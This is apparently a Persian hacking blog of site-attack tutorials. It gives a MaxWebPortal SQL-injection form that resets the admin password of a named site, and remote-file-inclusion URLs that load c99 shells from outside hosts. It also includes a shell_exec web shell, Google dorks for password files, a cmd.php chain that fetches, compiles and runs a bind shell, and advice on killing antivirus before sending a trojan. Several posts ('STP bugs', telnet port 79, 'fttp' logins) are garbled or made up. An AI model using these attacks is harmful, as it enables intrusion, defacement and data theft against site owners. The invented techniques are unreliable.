![]() |
![]() |
|
| اموزش پیشرفته هک |
|
اموزش هک انواع سایت
|
|
+ نوشته شده در
چهارشنبه هفتم آذر 1386ساعت 6:1 توسط مهدی |
|
|
حتما حتما از ارشیو هم دیدن کنید
چون اونقدر حجم مطالبم زیاد بود که تو صفحه اصلی جا نشد نظر هم بدید به مطالب وبلاگ من تنها وبلاگ مرجع برای یاد گیری و هک هر نوع سایت و سرور است خالی بندی |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:12 توسط مهدی |
|
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:10 توسط مهدی |
|
|
Remote FIle Inclusion طیف وسیعی از اسیب پذیری ها رو شامل می شهیه صفحه ی web به چند طریق متغیر می گیره1. get2 . postتو یک صفحه web چه asp یا چه php ممکنه یک یا چند صفحه ی دیگه include بشه و دیگه از تکرار جلوگیری بشهمثلآ من header.php رو تو همه ی صفحه ها منهای چند صفحه احتیاج دارممیام تو صفحه های که احتیاج دارم اون رو include می کنمPHP Code :include("header.php ");بعضی وقتا هم بجای header.php از یه متغیر استفاده می کنمحالا اگه متد get به طور مثال باز باشه منم به جای اون متغیر از یه ادرس وب که تو اون یه فایل text یا php محتوی یه سری کد داشته باشم اون کد ها داخل اون صفحه قرار می گیره و include می شهحالا اون فایل php اگه یه shell باشه من به فایل ها و فولدرای اون سایت که همچین صفحه ای داره دسترسی دارم و می تونم هکش کنم |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:9 توسط مهدی |
|
|
php shell ها فایل هایی هستن که با اون ها میتونید کارای خاصی رو روی یه سرور انجام بدید و اگه روی اون Server یا site از اون سرور upload بشه دسترسی های خاصی رو بهتون می دهمثلآ اپلود و یا داونلود فایل های روی اون سایت داونلود برای همه ی فایل ها و اپلود برای فایل های دارای سطح دسترسی write برای عموماتصال به بانک اطلاعاتی همچون phpmyadminاجرای command مثل ssh در لیوکس و یا command prompt در windowsحالا این php shell یا کد های محتوی اون به روش های مختلفی می تونه رو ی قربانی اجرا و یا upload بشهمثلآ remote file upload و یا remote file include این نمونه باگ ها رو تو بخش last news تالار میذاریمفایلی هم که باید upload بشه یا include بشه اینجا می ذارم داونلود کنید |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:9 توسط مهدی |
|
|
با اين exploit مي تونيد يه user ادمين تو max portal اضافه كنيدmaxwebportal 1.36 كد زير رو تو يه فايل html ذخيره كنيدtest.html كد: <" form action="http://www.bid-web.com/maxwebportal/password.asp?mode=reset" method="post>
pass1: <input name="pass" type="text" value="123456" size="150" >pass2: <input name="pass2" type="text" value="123456" size="150" >Id: <input name="memId" type="text" value="-1" size="150" >Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2" size="150 ">
<" input name="Submit" type="submit" value="Submit></ form>
user:admin pass:123456 بعد باهاش وارد صفحه ي ادمين بشيد و ... كنيد اين exploit واسه maxwebportal 1.36 بوده و سايت بالا هم همين ورژنهبراي ورژن هاي 1.35 از كد زير استفاده كنيد كد: < form action="http://[URL]/password.asp?mode=reset" method="post">
pass1: <input name="pass" type="text" value="123456" size="150" >pass2: <input name="pass2" type="text" value="123456" size="150" >Id: <input name="memId" type="text" value="-1" size="150" >Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150" >
<" input name="Submit" type="submit" value="Submit></ form>سايت ها ي ديگه هم كه max portal روشونه رو تو گوگل مي تونيد پيدا كنيد و به جاي http://www.bid-web.com/maxwebportal/ در كد بالا قرار بديد |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:8 توسط مهدی |
|
|
سلام دوستان اين اكسپلويت را يه نفر تو اشيانه نوشته كه تو تمام نسخه هاي ويندوز كار ميكنه این یه اکسپلویت local هست با این اکسپلویت بعد از connect شدن میتونی process ها رو ببندید فرض کنید به یه سیستم نفوذ کردید. اما وقتی می خوایید یه تروجان براش بفرستید آنتی ویروس بهش گیر میده. اول این نیما رو می فرستی بعد nima.exe mcafee.exe مک افی رو مینویسید که در این صورت ویروس اسکن مکافی دیگه بسته میشه. فکر کنم منظورمو رسوندم exm:nima.exe explorer.exe |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:8 توسط مهدی |
|
|
این یک Exploit جدید که هنوزم روی سایت ها کار می کنه چون سه روز بیشتر نیومده. آموزش: اول یکی از 4 عبارت نوشته را در گوگل سرچ کنید .. و بعد از سرچ شدن گوگل سایت هایی را پیدا میکنه که می تونید آنهارو هک کنید. بهتر هست که از صفحه های 3 یا 4 گوگل شروع کنید چون سایت های صفحه ی اول بیشترشون یا همون اول هک شدن یا path شدن خوب حالا با فرض این سایت پیدا شد حالا چی کار کنیم . . .فرض اسم سایتمون www.site.com است باید یکی از دو عبارت exploration را به جلوی اسم سایت یعنی www.site.com اضافه کنید اگه سایت آسیب پذیر بود که خوشبحالتون ولی اگه آسیب پذیر نبود که نمی تونید وارد بشید. . . . و مورده دیگری که باید بگم اینه که به جای http://[evilhost] باید آدرس های PHPSHELL خودتون رو قرار بدین مثل C99 و r57 و . . که این فایل ها با پسوند PHP یا TXT وبا حتی Gif می توانید در Host های خود upload کرده مثل Persiangig آپلود کرده و به جای اون آدرس قرار دهید اگر سوالی من در خدمت هستم Google Search : allinurl: *.php?Artid=* allinurl: *.php?ArtCat=* allinurl: wmprint.php allinurl: wmview.php exploration :/index.php?config=1&base_datapath=http://[evilhost] [ dir]/index.php?config=1&base_datapath=http://[evilhost]/ |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:7 توسط مهدی |
|
|
سرور چيزي نيست جز يک کامپيوتر که تعدادي فايل و دايرکتوري روي ان ذخيره شده . سيستم عامل اين کامپيوتر به گونه ايست که علاوه بر دسترسي مستقيم به ان ( تا اينجا مثل هر کامپيوتري) اجازه ميدهد که افراد از کامپيوتر هاي ديگري که از طريق يک شبکه بدان کامپيوتر متصل اند به ان فايل ها دسترسي داشته باشند. اما براي دسترسي به اين فايل ها مقرراتي وجود دارد که همان admin معروف که سرپرستي اين شبکه را بر عهده دارد وضع ميکند. او دسترسي به بعضي فايل ها را محدود و به بعضي ديگر را مجاز ميسازد. يا براي دسترسي به فايل ها پس ورد هايي کي گذارد که تنها افراد خاصي بدان ها دسترسي داشته باشند. تمام تلاش هکر دسترسي به اين فايل هاست که دسترسي بدين فايل ها بواسطه پس وردي محدود شده است. پس تا اينجا واضح شد که هر کس براي دسترسي به اين فايل ها بايد حداقل با سيستم عامل ان سرور خاص اشنا باشد. و بعد نيز با شيوه دسترسي به اين فايل ها از راه دور (ftp). حالا فرض کنيد که ان سيستم عامل يونيکس است و شما قصد داريد فايل اچ تي ام ال حاوي اطلاعات مربوط به صفحه اول سايتي دست يافته به جاي ان صفحهاي قرار دهيد که حاوي اسم شريفتان با ادرس ايميلتان است ( مثلا : "اين سايت توسط من "علی سلیمی" هک شد. اي ميل:XXXX@xxx.XXX") براي اين کار شما تلاش خواهيد کرد که مثل کامپيوتر خانه يتان وارد دايرکتوري مربوطه شده فايل x را انگولک کنيد. ان اول ها انجام يک چنين کاري بسيار ساده بود اما هر چه مي گذرد دسترسي به اين فايل مشکل و مشکل تر ميشود ( البته هاست هاي ايران که هنوز عقب افتاده تر از اين حرفهايند) مثال: حالا فرض کنيد که اين سرور از ان نسبتا عقب مانده هاست و ما نيز قصد داريم به شيوه نسبتا بدوي و اما مهم از جنبه اموزشي ان فايل را انگولک کنيم. ابتدا مواد مورد نياز: دانستن دستورهاي ساده يونيکس : HELP = HELP COPY = CP MOVE = MV DIR = LS DEL = RM CD = CD همين ها بس است. داشتن برنامهاي مثل Cracker Jack و يا مشابه مه بعدا مي گوييم چه کار مي کند.حالا بايد راهي پيدا کرد که بر ان پس ورد لعنتي فائق امد ( که البته همه کار همين است ) در سيستم هاي بونيکس تمام پس ورد هاي سيستم در داخل فايلي که در دايرکتوري به نام : / etc است قرار دارند. پس فايل ما ادرسش مي شود : /etc/passwd . اگر فکر مي کنيد که با دسترسي به اين فايل همه پس وردها از انه شماست و کار انجام شده ، در اشتباهيد. زيرا تمام اطلاعاته موجود در اين فايل به صورتي يک طرفه "کد" شده اند و عملا "decode " کردن ان ممکن نيست. پس چه بايد کرد:ان برنامه اي که ان بالا اسمش را بردم ( Cracker Jack) برنامه ايست که ان فايل کد شده را برداشته و سعي مي کند با تطبيق دادن ان با کلماتي از پيش معين . پس ورد هاي موجود در ان فايل را پيدا کند .(مثل کاري که يک باستان شناس براي خواندن خط باستاني مي کند).پس کل عمليات ساده شد به دستسي به فايل پسوردها و کشف رمزها بواسطه ان برنامه . نکته اينجاست که ان ادمين کذايي قرار نيست که پس ورد ها را دودستي به شما تقديم کند. براي دسترسي به ان فايل پس ورد ها بايد از ftp استفاده کنيد |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:6 توسط مهدی |
|
|
نکته : برای تایپ سمبل © در قسمت Run ویندوز charmap را تایپ کنید و در اون صفحه روی این سمبل دو بار کلیک کنید و سپس دکمه کپی را بزنیدابتدا اینو تو گوگل سرچ کنید ZIX Forum 1.12©برای راحتی از صفحات 4 یا 5 به بعد رو امتحان کنید========================================== قبلش هم به این ادرس برید برای دریافت Exploit حمله www.milw0rm.com/exploit/2306تو این سایت به سطری که نوشته User name یرید و از قسمت Replynew.asp ...... به بعد رو کپی کنید========================================== حالا اگر سایتی رو پیدا کردید در ادرس بارتون عبارت default.asp رو پاک کنید و به جاش اون Exploit رو کپی کنید و اینتر کنیدنکته : تو اون سایت Exploit میتونید با سطری که اولش نوشته password هم همین کار رو کنید ( اینم مثل سطر User name از قسمت Replynew.asp ...... به بعد رو کپی کنید و روی سایت بزنید )پس چی شد ما یه بار کد username و یه بار هم کد password رو زدیم در ادامه ادرس سایتنکته : ما هر کدوم از کدها رو جداگانه روی سایت امتحان کردیم حالا تو همون سایت Exploit قسمت اخر که نوشته Admin panel از قسمت theadmin/.... به بعد رو کپی کنید و روی سایت مثل همون User name بزنید که باید وارد قسمت login بشید حالا شما میتونید بدون وارد کردن username , password وارد مدیریت سایت بشیدحالا اون بالاهای سایت دنبال دکمه تنظیمات (Setting) رو بزنیدبعد روی متن New layout کلیک کنیدحالا تو جعبع متن های مربوطه مشخصات خودتون رو بنویسید و پست کنید و این بار به جای Defult.asp که پاک کرده بودید بنویسید main.asp و اینتر کنید و بس. تمام شد |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:6 توسط مهدی |
|
|
این کار به دو صورت امکان پذیر است 1. تو سایت گوگل روی لینک "جستجوی پیشرفته" کلیک کنید و باقی ماجرا که ساده است 2. تو همون سایت اصلی توسط یک سری لغات کلیدی گوگل یک موتور جست و جوی پرقدرت است که گاهی اوقات هکرها از آن برای پیدا کردن پسوردها و دیگر اسناد محرمانه و حساس استفاده می کنند. اطلاعاتی که شرکت ها و یا وب سایت های مختلف از در معرض خطر بودن آن ها بی اطلاع هستند. تقریبا همه ی کاربران اینترنت از گوگل استفاده می کنند اما تنها تعداد کمی از آن ها با همه ی پارامترهای قابل استفاده برای جست و جو در گوگل اطلاع دارند. در واقع "گوگل هکینگ" یک نوع متد است که بعضی از افراد از آن علاوه بر پیدا کردن پسورد یا اطلاعات حساس برای پیدا کردن آسیب پذیری های سرورهای وب استفاده می کنند. من در این جا تعدادی از پارامترهای جست و جو به همراه چند مثال آماده کرده ام: متد filetype با استفاده از این متد می توانید به گوگل بگویید که در اینترنت به دنبال فایل هایی با پسوند تعیین شده (مانند jpg,txt,mdb) بگردد.برای مثال می توانید این عبارت را در گوگل جست و جو کنید: filetype:txtو سپس گوگل لیستی از فایل های txt را در اختیار شما قرار می دهد.با استفاده از متدی دیگر شما این توانایی را دارید که به گوگل بگویید فایل هایی با پسوند مورد نظر را فقط در سایت هایی با دومین های خاص(مانند com,org,ir,gov) جست و جو کند: filetype:pdf site:comو به این ترتیب، گوگل جست و جو را محدود به سایت هایی که دارای دومین com هستند می کند. (مانند : www.target.com)متد cacheبا استفاده از این متد گوگل ورژن صفحه ی وب مورد نظر را که ذخیره کرده ، نشان می دهد. برای نمونه می توانید عبارت رو به رو را در گوگل سرچ کنید: cache:www.microsoft.comمتد intextاین متد برای جست و جوی کلمه یا متن مورد نظر در گوگل مورد استفاده قرار می گیرد. برای نمونه می توانید عبارت رو به رو را در گوگل سرچ کنید: intext:confidentialکه در واقع گوگل تنها لینک صفحه های وبی را که دارای کلید واژه ی confidential هستند برمی گرداند.متد inurlاین متد برای جست و جوی صفحاتی که در آدرس مشخصی قرار دارند مورد استفاده قرار می گیرد. برای نمونه: inurl:admin صفحاتی مانند http://target.com/admin/page.php که واژه ی admin در آدرس آن ها قرار دارد را در اختیار شما قرار می دهد.این متد را می توان به همراه متد filetype که در ابتدا توضیح داده شد نیز به کار برد. inurl:passwd filetype:txtشما همچنین می توانید از متد allinurl نیز استفاده کنید. تفاوت این دو متد با این مثال روشن می شود: allinurl:admin/databasesمتد linkبا استفاده از این متد، گوگل صفحه هایی را که به یک آدرس مخصوص لینک داده اند جست و جو می کند. برای مثال link:www.irchatan.com لیستی از سایت هایی که به سایت ایرچتان لینک داده اند را به شما نشان می دهد.متد relatedبا این متد، گوگل صفحه هایی را که به صفحه ی مورد نظر شما شبیه هستند برای شما لیست می کند. برای مثال با سرچ کردن عبارت related:www.thenetworkadministrator.com در گوگل، لیستی از صفحاتی که به home page سایت ذکر شده شباهت دارند در اختیار شما قرار می گیرد.شما می توانید از مثال های زیر که رایج هستند استفاده کنید: intitle: examples :intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov inurl: examples :inurl:admin filetype:txt inurl:admin filetype:db inurl:admin filetype:cfg inurl:mysql filetype:cfg inurl:passwd filetype:txt inurl:iisadmin inurl:auth_user_file.txt inurl:orders.txt inurl:"wwwroot /*."inurl:adpassword.txt inurl:webeditor.php inurl:file_upload.php inurl:gov filetype:xls "restricted " |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:5 توسط مهدی |
|
|
اول این عبارت رو تو گوگل سرچ کنید و در ضمن برای راحتی کار به صفحات اخر سرچ برید چون سایتهایی که در صفحات اولیه هستند قبلا هک شدند " Google Search : "© Sabdrimer CMSExploit :http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script] My PHP Shell Address : http://www.godekalb.com/data/c99.txt? که در کد بالا به جای [ evil_script] باید کد پایینیشو رو قرار بدید که کد Exploit کامل میشه :http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=http://www.godekalb.com/data/c99.txt? حالا مثلا شما یه سایت رو پیدا کردید که اخر ادرسش به صورت http://www.website.com/Index.php است شما باید index.php رو پاک کنید و کد بالا رو به جاش کپی کنیدالبته موقع کپی حواستون باشه قسمت http://www.website.com رو همراه کد کپی نکنیدو بعد از این کار حالا اینتر کنید و فایل c99.txt که قبلا یه جا آپلود کردیم (که من برای راحتی شما قبلا آپلود کردم) تو سایتمون Inclusion میکنیمبعد از وارد شدن به قسمت مدیریت اون وارد شاخه Public html بشید مثل تصویر و بعد اون پاییش وارد این دایرکتوری بشید و بعد اون پایین اون صفحه *.html که خودتون از قبل ساختید رو از تو هارد تون انتخاب و اپلود کنید و جایگزین صفحه سایت اصلی کنید
بعد تو قسمت ادرس بار مرورگرتون این ادرس رو تایپ کنید و حال کنید
که "فایل شما" نام فایل Html است که شما آپلود کردیدتبریک میگم شما موفق شدید |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:4 توسط مهدی |
|
|
در اين مقاله شما با PHP Shellers آشنايی کامل پيدا خواهيد کرد . PHP Shell ها با يک سری کدهای PHP نوشته شده اند و به هکر اين اجازه رو ميدن که در صورت آسيب پذير بودن server به ديگر سايتها و ديگر فايلها و پوشه های server دسترسی داشته باشه و بتونه فايل آپلود کنه يا فايلی رو بخونه يا پاک کنه يا توش چيزی بنويسه و Save کنه البته اين به پرميژنی که فايل يا پوشه داراست بستگی داره که بعدا با پرميژن آشنا ميشيم .perm :پرميژن ميزان دسترسی فايل يا پوشه رو تعئين ميکنه . که پرم 777 از همه با لاتر هستش و دسترسی Read - Write - Execute داره يعنی اگه Folder باشه ميتونيم توی اون Folder فايل کپی کنيم يا بخونيم و ياDelete کنيم .نکته/ اگر فايلی پرمی باشه که بشه توش Write کرد به اصطلاح بهش ميگن اين فايل Perm هستش !چيزها يی که درباره Perm ها بايد بدانيم :Perm هايی که با حرف d شروع ميشه يعنی اينکه پوشه هستند ( Folder ) که حرف d معرف Directory هستش مانند : drwxrwxrwx که اين پرم يک پرم 777 هستش . شما در اين Folder ها ميتوانيد فايل آپلود کنيد .Perm هايی که با خط تيره ( - ) شروع ميشوند نشون ميدان که فايل هست نه Folder !برای مثال : - rw-rw-rw- که شما با Edit کردن فايل ميتونيد توش هر کدی رو يا نوشته اي رو save کنيد .حرف r به معنی Read و حرف W به معنی Write هستش .اگر از شل c99 استفاده ميکنيد . کار شما راحتر هستش چرا که فايلها و دايرکتوری هايی که پرم هستن در C99 به رنگ سبز در قسمت مربوط به پرمها مشخص هستند و آنهايی که سفيد يا قزمز هستند به معنی پرم نبودن آنها هست .پس يادتون باشه اگر دسترسی بالا نداريد ( Root ) پس فقط در دايرکتوری و فايلهايی که پرم هستند ميتوانيد فايل کپی کنيد يا آپلود کنيد . و يا در فايلها بنويسيد .نکاتی در باره C99 :بعد اينکه C99 رو جايی آپلود کرديم بايد به نکاتی توجه کنيم :به بالای C99 دقت کنيد .
1 = اين قسمت برنامه هايی که WeB Server برای WeB استفاده ميکنه و همچنين ورژن php رو نشون ميده .2 = Uname -a سرور که اطلاعاتی درباره server هست رو به ما ميده که من اينجا رو سيستم خودمphp shell رو بالا آوردم ( لوکال ) و از ويندوز استفاده ميکنم .3 = اين قسمت خيلی مهّم هستش ! اگه Safe-Mode = On باشه server ميشه گفت Secure هستش ولی باز ميشه کاری کرد . در اين حالت هيچ کمندی قابل اجرا نيست و رفتن به دايرکتوری ديگه ممکن نيست .در چنين مواقع ميتوانيد از باگ های PHP Safe Mode Bypass که سيف مد رو دور ميزنه استفاده کنيد . ( در صورتی که پچ نشده باشه )4 = اين قسمت دايرکتوری که در آن هستيم رو نشون ميد که من اينجا در درايو C خودم هستم و با پرم 7775 = اين قسمت ميزان فضای خالی هارد رو مشخص ميکنه و ... 6 = اين قسمت درايو های هارد منو نشون ميده به عکس زير دقت کنيد . قسمتی که با عدد 1 معرفی شده دارای 3 عمل به شرح زير ميباشد که روی يک فايل ميتواند اجرا بشود . ولی روی Folder ها وقت يک عمل Info قابل اجرست که اطلاعاتی راجع به Folder به ما ميدهدبه ترتيب از سمت چاپ به راست اينگونه است : Info - Edit - Download
بسيار خوب فکر ميکنم اطلاعات کافی درمورد PHP shell ها دادم .بياييد خودمون يک نمونه php shell بنويسيم که روی يک server که php ساپورت ميکنه Command اجرا کنه :يک فايل php shell ميتواند Command را به صورتهای گوناگونی که موجود است Execute کنه روی يک server که به شرح زير هستند :
اينجا من از Shell_exec برای اجرا کردن Command خودم روی يک server استفاده ميکنم . يک Notepad باز کنيد و کدهای php زير را توش بنويسين .<? $ cmd=$_Get['cmd'];$ exec=shell_exec("$cmd");//"$ executing"; echo <Center><textarea rows='10' cols='55' > $executing </textarea> </center>";?> بسيار خوب حالا با پسوند php سيو کنيد و روی يک هاست آسيب پذير آپلود کنيد . و بعد از باز کرد صفحه شلبعد از آدرس شل اين کد رو بنويسين ? cmd= بعد از (=) Command مورد نظر خود را اجرا کنيدبرای مثال : http://www.site.com/shell.php?cmd=ls => در لينوکسhttp://www.site.com/shell.php?cmd=dir => در ويندوزپيشنهاد ميکنم دستورات لينکوس و ويندوز رو بلد باشيد مخصوصا لينکوس که بيشتر server ها لينوکس هستندما shell های زيادی داريم بعضی از آنها را در زير ميبينيد :c99 nstview webadmin cmd.php در ضمن برای هک کردن سايتها از باگ هايی نظير remote File Inclusion شما ميتوانيد اين shell ها را با پسوند .txt يا بدون پسوند روی يک فضای خالی آپلود کنيد و در اين گونه باگ ها ازش استفاده کنيد !يک نمونه فضای رايگان www.sharemation.com بعد از ثبت نام يادتون نره که فايل آپلود شده رو از Panel خودتون Share کنيد . |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 23:0 توسط مهدی |
|
|
یک سری از بهترین باگ هایی که برای اسکن کردن سایت ها استفاده می شن رو گذاشتم برای استفاده از این باگ ها باید برنامه STP Supporter رو روی سیستمتون نصب کنید چون این باگ تحت سیستم عامل های STP ( مانند یکی از باگ های قبلی ) کار میکنه و برای این که سیستمتون بتونه ساپورت کنه باید این برنامه رو روی سیستمتون نصب کنیداز این باگ های توپ استفاده کنید : www.VICTIM.com/stpOSsupport.htm www.VICTIM.COM/stpsystemsupportSCAN.htm www.VICTIM.com/StpSystemScanner.php www.VICTIM.com/NustelSTP.aspx |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:57 توسط مهدی |
|
|
شما میتونین با این باگ سایت هایی رو که از سرور ECHOP استفاده میکنند رو هک کنید یا در واقع وارد بخش مدیریت بشیننحوه استفاده : ابتدا باید یک سایت رو که از این سرور استفاده میکنه پیدا کنید ( من پیشنهاد میکنم که در گوگل یا یاهو عبارت Powerd By ECHOP server رو تایپ کنید ) بعد از این که یکی از این سایت ها رو پیدا کردید صفحه لاگین رو پیدا کنید ( عبارت سرچش می شه : echopserver .login ) بعد از این که پیدا کردین به جای یوزر عبارت x%'s رو تایپ کنید و به جای پسورد Xc'slg رو تایپ کنید و سپس لاگین کنید . اگر لاگین نشد دکمه Shift رو نگه دارین و عبارات بالا رو به جای یوزر و پس تایپ کنید و این دفعه مطمئن باشید که باگین میشه . اینو بگم که بعضی از این سایت ها پسوند org. دارند . مثلا من یک نمونه رو خودم زدم که آدرس این هستش : www.Mark.Org |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:56 توسط مهدی |
|
|
امروز میتونید به سیستم هایی که از nDoc مدل ICP استفاده میکنند نفوذ کنید و سیستم رو بدست بگیرید. اولین سوالی که برای ما پیش میاد که چه سرور هایی روی این سیستم ها ساپورت میشه ؟ این سیستم ها برای Range های 22.34 طراحی شده اند و آسیب پذیری این سیستم ها بسیار زیاد هستش و راحت می شه این سیستم ها رو هک کرد . ساپورت کننده این سیستم ها سرور های Tuv و بعضی وقت ها Cert هستن . همون طور که می دونید آسیب پذیری سرور های tuv تقریبا بین 22 تا 24 هستند اما آسیب پذیری سرور های cert براحتی به اندازه 22.34 میرسند و راحت میشه هکشون کرد . آموزش هک سیستم های ICP سرور ** Cert ** : برای این که براحتی بتونین از سرور های این سیستم بگذرین ابتدا از سرور آسیب پذیر شروع میکنم ( CERT Server ) . برای گذشتن از این سرور آسیب پذیر باید یک پرت باز آسیب پذیر که روی tag های سیستم باز هستش رو پیدا کنید . ( معمولا همیشه روی این سرور پرت ۷۹ باز هستش ) پس ما هم در این جا از پرت 79 استفاده میکنیم . برای رد شدن از سرور ابتدا کامند پرت ویندوز رو باز میکنید و فرمان Telnet www.VICTIM.com/79 این فرمان برای رد شدن از سرور های وب سایت های آسیب پذیر هستش اما فرمانی که برای نفوذ به قسمت آسیب پذیر سرور کامپیوتر ها هستش این هستش : Telnet /79 . این روش برای رد شدن از سرور های CERT هستش.بعد وارد CMD شوید و فرمان : Share www.ICPsystem.com حالا اینتر رو بزنید و بعد باز هم فرمان : NET shareICPsystem.com/ng/VICTIMip/PORT رو بنویسید فقط همون طور که میدونید تو قسمت Ip باید آیپی سیستم قربانیتون و در قسمت PORT باید یک پرت باز روی این سرور رو بنویسید . ( 79 باز هست ) . حالا اگر مراحل رو درست رفته باشید باید به قسمت آسیب پذیر سرور سیستم قربانی وصل بشین و شل بگیرین . و حالا باید دستورات بعد از شل رو بلد باشید میتونید تمام سیستم رو زیر دست بگیرید . |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:56 توسط مهدی |
|
|
یک سری از باگ های stp رو میذارم . دوباره باید برنامه STP SUPORTER رو نصب کنید تا بتونید استفاده کنید . ولی با این باگ راحت سیستم های لینوکس را زیر هک کنید. باگ های هک لینوکس : www.Victim.com/verdanaBUGstp.php www.Victim.com/parsia20%Bugs.php |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:55 توسط مهدی |
|
|
آموزش کمپایل کد : برای کمپایل کردن این کد باید از فرمان Compile {Code} PHP استفاده کنید |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:55 توسط مهدی |
|
|
با استفاده از باگ میتونید سایت های linux رو به راحتی هک کنید http://www.vicitm.com/HP-CD.php |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:55 توسط مهدی |
|
|
برای این کار ابتدا یک سایت که از سرور fttp استفاده میکنه رو پیدا کنید و بعدش باید صفحه لاگین رو پیدا کنید . من پیشنهاد میکنم برای پیدا کردن آسون تر صفحه لاگین مثلا اگه اسم سایت عبارت زیر بود : fttp:/arian(c).com/home.php این جوری عمل میکنم و صفحه لاگین معمولا مانند عبارت زیر هستش ( البته در این نوع سایت ها ) : fttp://arian(c).com/login.php . حالا راحت به جای passwrod عبارت : pingSQLF'T'TP و به جای username عبارت a''d'mi'n این کار باعث میشه سرور ها تمامیشون هنگ کنن و شما به عنوان مدیر وارد بخش مدیریت وب سایت بشید . حالا هر کاری دوست داشتین با اون سایت انجام بدین . |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:54 توسط مهدی |
|
|
ساده ترین روش هک کردن سایت ها روش های تازه و جدید هک کردن سایت های PHP هستند . برای هک کردن این نوع سایت ها بسیار روش و باگ منتشر شده است اما بیشتر اون ها رو مدیران پوچ میکنند یا اصلا باگ قلابی هستش . من امروز بهتون چند تا باگ خیلی خوب معرفی میکنم که بتونین تقریبا این نوع سایت ها رو هک کنید . فقط سریع یعنی همین الان هک کنید تا پوچ نشده این باگ ها رو از وب سایت تیم امنیتی McGraWHill گرفتم و مطمئن باشید که کار میکنه . باگ اول : با استفاده از این باگ میتونید Title سایت رو عوض کنید و هر چی دلتون میخواد بذارین . یعنی این که باگ زیر تاتل رو Hacker By Iranain Hacker تغییر میده . http://sitaname/ad++xhome/title:=HackeD By Iranian Hackers باگ دوم : این باگ یک حفره خیلی جالب هستش که شما با این حفره و در واقع با این باگ میتونید یک فایل TXT به سایت اضافه کنید و مثلا توش بنویسید که hacked by iranian hackers و بعد فایل رو روی سایت آپلود کنید . الان باگ زیر همین نوشته بالا رو با پسوند txt به سایت قربانی اضافه میکنه . http://sitaname/ad++xhome/filename:=hacked/txt:=hacked by iranian hackersباگ سوم : این هم یک باگ بسیار جالب که شما میتونید با استفاده از این باگ راحت به بخش مدیریت سایت دسترسی داشته باشید . من این باگ رو هیچ جا ندیدم خیلی باحاله خودم هم دو تا سایت باهاش زدم . http://sitaname/even''+-s%managepanle.x/pass=usd/usd=admin''/event |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:54 توسط مهدی |
|
|
من به شما یک روش آسان رو یاد میدم . برای هک کردن سایت های آپاچی ابتدا میبایست چک کنید که آیا روی هاست سایت آنتی ویروسی نصب شده است یا نه ؟ خب برای این کار باید از یک برنامه Appache Scanner استفاده کنید .که من لینک دانلود این برنامه رو براتون آپلود کردم . بعد از این که سایت رو اسکن کردید باید ببینید که در عبارات عبارت s'p23 هستش یا خیر . اگه بود یعنی این که امنیت سایت فوق اولعاده پایین هستش . و شما میتونید فقط با دستور telnet www.site.com/79/s'p32 تحت داس یا داس مجازی این سایت رو هک کنید و هر کاری دلتون خواست با اون سایت بکنید .اما اگر دیدید که به جای این عبارت عبارت SYS2234 یا AP-KNUD-SEC بود کار سخت تر میشه باید اول به سرور و باگ کشف شده بسیار عالی در سرور های آپاچی وصل شین .برای این کار تحت داس عبارت زیر را بزنید :Net Start www.site.com/http://arianhaacker.persiangig.com/shell.txt |
|
+ نوشته شده در
سه شنبه چهارم مهر 1385ساعت 22:53 توسط مهدی |
|
|
در مرحله اول شما باید سایت هایی رو که لینوکس ساپورت میکنه و دارای حفره cmd هستش رو پیدا کنید تا بعدش با استفاده از باگ های منتشر شده از طریق این حفره به وب سایت نفوذ کنید . خب من توصیه میکنم در گوگل عبارت : cmd.php رو سرچ کنید . اگر هم حوصله سرچ ندارین من براتون لینک سرچ رو میذارم . http://www.google.com/search?hl=en&lr=&q=CMD.PHP من نمیگم فقط همین عبارت سایت های زیادی رو بهتون میده که دارای این حفره هستند .حالا شروع میکنم به گفتن باگ ها برای مثال شما سایتی دارای این حفره با نام : www.victim.com/cmd.phpپیدا کردین . باگ اول : این باگ برای این کار هستش که شما Operaing System قربانی خودتون رو مشاهده کنید :www.victim.com/cmd.php??cmd=uname%20-a باگ دوم : با این باگ شما میتونید به راحتی از سایت قربانی شل بگیرین و باین شل رو روش اجرا کنید : http://www.victim.com/cmd.php?http://packetstormsecurity.nl/advisories/suid/bindshell.c باگ سوم : با این باگ شل رو میفرستیم تو کامپیوتر مورد نظرمون www.victim.com/cmd.php?cmd=wget%20http://packetstormsecurity.nl/advisories/suid/bindshell.c باگ چهارم ( مهم ) : با این باگ شما بایند شل رو تو سیستم قربانی کمپایل مکیند و اماده نفوذ میشین . www.victim.com/cmd.php?cmd=gcc%20-o%20bind%20bindshell.c باگ آخر ( خیلی مهم ) : با این باگ شما بایندشل رو تو سیستم قربانی ران میکنید و در واقع آخرین مرحله نفوذ هستش و فقط 